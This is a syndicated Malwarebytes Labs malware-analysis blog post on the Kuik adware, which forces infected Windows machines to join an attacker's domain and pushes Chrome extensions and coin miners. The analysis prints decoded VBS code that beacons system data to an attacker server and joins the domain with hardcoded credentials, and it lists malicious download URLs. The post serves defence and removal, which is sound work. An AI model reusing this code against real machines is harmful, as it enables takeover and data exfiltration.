SBN

Kuik: a simple yet annoying piece of adware

Some pieces of malware can be so simple—and yet such a pain to get rid of—especially when they start interfering with your system’s configuration. This much is true for the Kuik adware program, which surprised us all by forcing affected machines to join a domain controller.

The perpetrators are using this unusual technique to push Google Chrome extensions and coin miner applications to their victims. In this blog, we’ll provide technical analysis of this adware and custom removal instructions.

Technical description

Stage 1 – .NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

The first stage is written in .NET with an icon imitating the Adobe Flash Player. This is typical of bundlers that promise to update software components but also add their own code to the original installer.

After opening with a dotNet decompiler (i.e. dnSpy), we found that the project’s original name was WWVaper.

It has three resources inside:

  • a certificate (svr.crt)
  • a legitimate Flash (decoy)
  • a next stage component (upp.exe)

The certificate:

-----BEGIN CERTIFICATE-----
MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNV
BAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoM
DEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0
QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczEL
MAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMG
A1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEW
EHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci
5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbD
oPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4y
vHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah4HtIYSJZ2xwIcH
qp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eX
N6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU
3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkG
A1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3
LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5t
ZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgB
hvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcN
AQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVm
AC+3h1huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi
0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX
2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ0
2zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX
+joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ=
-----END CERTIFICATE-----

Details of the certificate:

The certificate points to a DNS name of yahoo.com. However, the certification path is invalid:

The .NET installer is responsible for installing the malicious certificate and other components. First, it enumerates the network interfaces and adds collected IPs to the list:

Then, it adds a new IP as a DNS (18.219.162.248) to the collected interfaces. It also installs its own certificate (svr.crt):

Stage 2 – upp.exe

This application is an installer bundle that is not obfuscated. Inside, we found a cabinet file:

It contains other modules to be dropped:

The application “install.exe” is deployed with the “setup.bat” as a parameter.

Stage 3 – unpacked components from the cabinet

The application install.exe is basic. Its only role is to run the next process in elevated mode. Below, you can see its main function:

The script setup.bat deploys another component named SqadU9FBEV.bat:

It delays execution by pinging 127.0.0.1. Then, it runs the second encoded script, giving it a campaign ID as a parameter:

The next element deployed is an encoded VBS script:

After decoding it (with this decoder), we saw this script in clear: NYkjVVXepl.vbs. We also saw that it fingerprints the system and beacons to a server:

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") 
for each System in SystemSet 
  winVer = System.Caption 
next
Function trackEvent(eventName, extraData)
  Set tracking = CreateObject("MSXML2.XMLHTTP")
  tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False
  tracking.send
  err.clear
End Function

The interesting fragment is about adding the infected computer to a domain:

SET objNetwork = CREATEOBJECT("WScript.Network")
strComputer = objNetwork.ComputerName
SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\" & strComputer & "rootcimv2:Win32_ComputerSystem.Name='" & strComputer & "'")
ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.comadministrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)
If (ReturnValue  0) Or (err.number  0) Then
  trackEvent "join-domain-failed", ReturnValue
  WScript.Quit 1
Else
  trackEvent "join-domain-success", Null
  WScript.Quit 0
End IF

Payloads

There are a range of payloads being used by this program, but bogus Chrome extensions seem to be a particular favorite. In addition, some coin miners are being served:

Removal

Malwarebytes users (version 3.x) can remove this threat from their system by running a full scan. The removal includes unjoining the malicious domain controller to restore your machine to its original state.

Indicators of compromise

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686
990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crx
d-and-h[.]com/123.crx
d-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crx
d-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crx
kuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crx
tripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B751
33D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB735968501268
7889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD
761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A
871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712

*** This is a Security Bloggers Network syndicated blog from Malwarebytes Labs authored by Malwarebytes Labs. Read the original post at: https://blog.malwarebytes.com/threat-analysis/2018/05/kuik-simple-yet-annoying-piece-adware/